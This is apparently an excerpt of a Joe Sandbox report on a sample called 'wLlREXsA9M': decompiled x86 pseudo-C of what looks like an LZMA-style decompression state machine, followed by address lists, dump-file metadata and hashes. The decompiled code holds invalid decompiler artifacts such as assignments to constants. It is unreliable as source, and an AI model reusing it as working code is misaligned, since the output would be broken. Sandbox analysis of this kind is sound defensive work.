							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406724
0x00406724
0x00406728
0x004067df
0x004067e2
0x004067ee
0x004066cf
0x004066cf
0x004066d2
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00406aba
0x00406aba
0x00406ac0
0x00406ac0
0x00000000
0x00406a95
0x00406a95
0x00406a99
0x00406c48
0x00000000
0x00406c48
0x00406aa5
0x00406aac
0x00406ab4
0x00406ab7
0x00000000
0x00406ab7
0x0040672e
0x00406732
0x00406c73
0x00406c73
0x00406c76
0x00406c7a
0x00406c7a
0x00406738
0x0040673e
0x00406741
0x00406745
0x00406748
0x0040674c
0x00406c12
0x00406c5e
0x00406c66
0x00406c6d
0x00406c6f
0x00000000
0x00406c6f
0x00406752
0x00406755
0x0040675b
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x00406781
0x00406783
0x00406783
0x00406786
0x00406786
0x00406786
0x0040625c
0x0040625c
0x00406265
0x00000000
0x00000000
0x0040626b
0x00000000
0x00406276
0x00000000
0x00000000
0x0040627f
0x00406282
0x00406285
0x00406289
0x00000000
0x00000000
0x0040628f
0x00406292
0x00406294
0x00406295
0x00406298
0x0040629a
0x0040629b
0x0040629d
0x004062a0
0x004062a5
0x004062aa
0x004062b3
0x004062c6
0x004062c9
0x004062d5
0x004062fd
0x004062ff
0x0040630d
0x0040630d
0x00406311
0x00000000
0x00000000
0x00000000
0x00000000
0x00406301
0x00406301
0x00406304
0x00406305
0x00406305
0x00000000
0x00406301
0x004062db
0x004062e0
0x004062e0
0x004062e9
0x004062f1
0x004062f4
0x00000000
0x004062fa
0x004062fa
0x00000000
0x004062fa
0x00000000
0x00406317
0x00406317
0x0040631b
0x00406bc7
0x00000000
0x00406bc7
0x00406324
0x00406334
0x00406337
0x0040633a
0x0040633a
0x0040633a
0x0040633d
0x00406341
0x00000000
0x00000000
0x00406343
0x00406349
0x00406373
0x00406379
0x00406380
0x00000000
0x00406380
0x0040634f
0x00406352
0x00406357
0x00406357
0x00406362
0x0040636a
0x0040636d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b2
0x004063b8
0x004063bb
0x004063c8
0x004063d0
0x00000000
0x00000000
0x00406387
0x00406387
0x0040638b
0x00406bd6
0x00000000
0x00406bd6
0x00406397
0x004063a2
0x004063a2
0x004063a2
0x004063a5
0x004063a8
0x004063ab
0x004063b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063d8
0x004063da
0x004063dd
0x0040644e
0x00406451
0x00406454
0x0040645b
0x00406465
0x00000000
0x00406465
0x004063df
0x004063e3
0x004063e6
0x004063e8
0x004063eb
0x004063ee
0x004063f0
0x004063f3
0x004063f5
0x004063fa
0x004063fd
0x00406400
0x00406404
0x0040640b
0x0040640e
0x00406415
0x00406419
0x00406421
0x00406421
0x00406421
0x0040641b
0x0040641b
0x0040641b
0x00406410
0x00406410
0x00406410
0x00406425
0x00406428
0x00406446
0x00406448
0x00000000
0x0040642a
0x0040642a
0x0040642d
0x00406430
0x00406433
0x00406435
0x00406435
0x00406435
0x00406438
0x0040643b
0x0040643d
0x0040643e
0x00406441
0x00000000
0x00406441
0x00000000
0x00406677
0x0040667b
0x00406699
0x0040669c
0x004066a3
0x004066a6
0x004066a9
0x004066ac
0x004066af
0x004066b2
0x004066b4
0x004066bb
0x004066bc
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c7
0x004066cc
0x00000000
0x004066cc
0x0040667d
0x00406680
0x00406683
0x0040668d
0x00000000
0x00000000
0x004066e1
0x004066e5
0x00406708
0x0040670b
0x0040670e
0x00406718
0x004066e7
0x004066e7
0x004066ea
0x004066ed
0x004066f0
0x004066fd
0x00406700
0x00406700
0x00000000
0x00000000
0x00000000
0x00000000
0x00406795
0x00406799
0x004067a0
0x004067a3
0x004067a6
0x004067b0
0x00000000
0x004067b0
0x0040679b
0x00000000
0x00000000
0x004067bc
0x004067c0
0x004067c7
0x004067ca
0x004067cd
0x004067c2
0x004067c2
0x004067c2
0x004067d0
0x004067d3
0x004067d6
0x004067d6
0x004067d9
0x004067dc
0x00000000
0x00000000
0x0040687c
0x0040687c
0x00406880
0x00406c1e
0x00000000
0x00406c1e
0x00406886
0x00406889
0x0040688c
0x00406890
0x00406893
0x00406899
0x0040689b
0x0040689b
0x0040689b
0x0040689e
0x004068a1
0x00000000
0x00000000
0x00406471
0x00406471
0x00406475
0x00406be2
0x00000000
0x00406be2
0x0040647b
0x0040647e
0x00406481
0x00406485
0x00406488
0x0040648e
0x00406490
0x00406490
0x00406490
0x00406493
0x00406496
0x00406496
0x00406499
0x0040649c
0x00000000
0x00000000
0x004064a2
0x004064a8
0x00000000
0x00000000
0x004064ae
0x004064ae
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064bf
0x004064c2
0x004064c4
0x004064ca
0x004064cd
0x004064d0
0x004064d3
0x004064d6
0x004064d9
0x004064dc
0x004064f8
0x004064fb
0x004064fe
0x00406501
0x00406508
0x0040650c
0x0040650e
0x00406512
0x004064de
0x004064de
0x004064e2
0x004064ea
0x004064ef
0x004064f1
0x004064f3
0x004064f3
0x00406515
0x0040651c
0x0040651f
0x00000000
0x00406525
0x00000000
0x00406525
0x00000000
0x0040652a
0x0040652a
0x0040652e
0x00406bee
0x00000000
0x00406bee
0x00406534
0x00406537
0x0040653a
0x0040653e
0x00406541
0x00406547
0x00406549
0x00406549
0x00406549
0x0040654c
0x0040654f
0x0040654f
0x0040654f
0x00406555
0x00000000
0x00000000
0x00406557
0x0040655a
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406569
0x0040656c
0x0040656f
0x00406572
0x00406575
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406596
0x00406599
0x0040659d
0x0040659f
0x00406577
0x00406577
0x0040657f
0x00406584
0x00406586
0x00406588
0x00406588
0x004065a2
0x004065a9
0x004065ac
0x00000000
0x004065ae
0x00000000
0x004065ae
0x004065ac
0x004065b3
0x004065b3
0x004065b3
0x004065b3
0x00000000
0x00000000
0x004065ee
0x004065ee
0x004065f2
0x00406bfa
0x00000000
0x00406bfa
0x004065f8
0x004065fb
0x004065fe
0x00406602
0x00406605
0x0040660b
0x0040660d
0x0040660d
0x0040660d
0x00406610
0x00406613
0x00406613
0x00406619
0x004065b7
0x004065b7
0x004065ba
0x00000000
0x004065ba
0x0040661b
0x0040661b
0x0040661e
0x00406621
0x00406624
0x00406627
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406636
0x00406639
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665a
0x0040665d
0x00406661
0x00406663
0x0040663b
0x0040663b
0x00406643
0x00406648
0x0040664a
0x0040664c
0x0040664c
0x00406666
0x0040666d
0x00406670
0x00000000
0x00406672
0x00000000
0x00406672
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406c2a
0x00000000
0x00406c2a
0x00406909
0x0040690c
0x0040690f
0x00406913
0x00406916
0x0040691c
0x0040691e
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a0e
0x00406a12
0x00406a34
0x00406a37
0x00406a41
0x00000000
0x00406a41
0x00406a14
0x00406a17
0x00406a1b
0x00406a1e
0x00406a1e
0x00406a21
0x00000000
0x00000000
0x00406acb
0x00406acf
0x00406aed
0x00406aed
0x00406aed
0x00406af4
0x00406afb
0x00406b02
0x00406b02
0x00000000
0x00406b02
0x00406ad1
0x00406ad4
0x00406ad7
0x00406ada
0x00406ae1
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00000000
0x00406bbc
0x00406bbf
0x00000000
0x00000000
0x004067f6
0x004067f8
0x004067ff
0x00406800
0x00406802
0x00406805
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406813
0x00406815
0x00406817
0x00406817
0x00406818
0x0040681b
0x00406822
0x00406825
0x00406833
0x00000000
0x00000000
0x00406b09
0x00406b09
0x00406b0c
0x00406b13
0x00000000
0x00000000
0x00406b18
0x00406b18
0x00406b1c
0x00406c54
0x00000000
0x00406c54
0x00406b22
0x00406b25
0x00406b28
0x00406b2c
0x00406b2f
0x00406b35
0x00406b37
0x00406b37
0x00406b37
0x00406b3a
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b40
0x00406b40
0x00406b44
0x00406ba4
0x00406ba7
0x00406bac
0x00406bad
0x00406baf
0x00406bb1
0x00406bb4
0x00000000
0x00406bb4
0x00406b46
0x00406b4c
0x00406b4f
0x00406b52
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b61
0x00406b64
0x00406b67
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8d
0x00406b8f
0x00406b8f
0x00406b90
0x00406b93
0x00406b69
0x00406b69
0x00406b71
0x00406b76
0x00406b78
0x00406b7b
0x00406b7b
0x00406b96
0x00406b9d
0x00000000
0x00406b9f
0x00000000
0x00406b9f
0x00000000
0x0040683b
0x0040683e
0x00406874
0x004069a4
0x004069a4
0x004069a4
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ac
0x00406c36
0x00000000
0x00406c36
0x004069b2
0x004069b5
0x00000000
0x00000000
0x004069bb
0x004069bf
0x004069c2
0x004069c2
0x004069c2
0x00000000
0x004069c2
0x00406840
0x00406842
0x00406844
0x00406846
0x00406849
0x0040684a
0x0040684c
0x0040684e
0x00406851
0x00406854
0x0040686a
0x0040686f
0x004068a7
0x004068a7
0x004068ab
0x004068d7
0x004068d9
0x004068e0
0x004068e3
0x004068e6
0x004068e6
0x004068eb
0x004068eb
0x004068ed
0x004068f0
0x004068f7
0x004068fa
0x00406927
0x00406927
0x0040692a
0x0040692d
0x004069a1
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x0040692f
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x0040694d
0x00406950
0x00406969
0x0040696b
0x0040696e
0x0040696f
0x00406972
0x00406974
0x00406977
0x00406979
0x0040697b
0x0040697e
0x00406980
0x00406983
0x00406987
0x00406989
0x00406989
0x0040698a
0x0040698d
0x00406990
0x00406952
0x00406952
0x0040695a
0x0040695f
0x00406961
0x00406964
0x00406964
0x00406993
0x0040699a
0x00406924
0x00406924
0x00406924
0x00406924
0x00000000
0x0040699c
0x00000000
0x0040699c
0x0040699a
0x004068ad
0x004068b0
0x004068b2
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x004065bd
0x004065bd
0x004065c1
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00000000
0x00406a09
0x00406a07
0x00406c3c
0x00000000
0x00000000
0x0040626b

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222bc9c3cafa9f387da9abee54f1e731c1fdcd660f231f8c0cc64ce420f22d70
Instruction ID: 93ffe4a93ca747dbf8a9a0e70d1bbbd091abc5eecd7fbd72d7efd6ec052c3b61
Opcode Fuzzy Hash: 222bc9c3cafa9f387da9abee54f1e731c1fdcd660f231f8c0cc64ce420f22d70
Instruction Fuzzy Hash: 13817671D04228CFDF24CFA8C844BADBBB1FB45305F25816AD856BB281C7789995DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406229 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406229(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406C7B))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc("true", 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc("true", _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
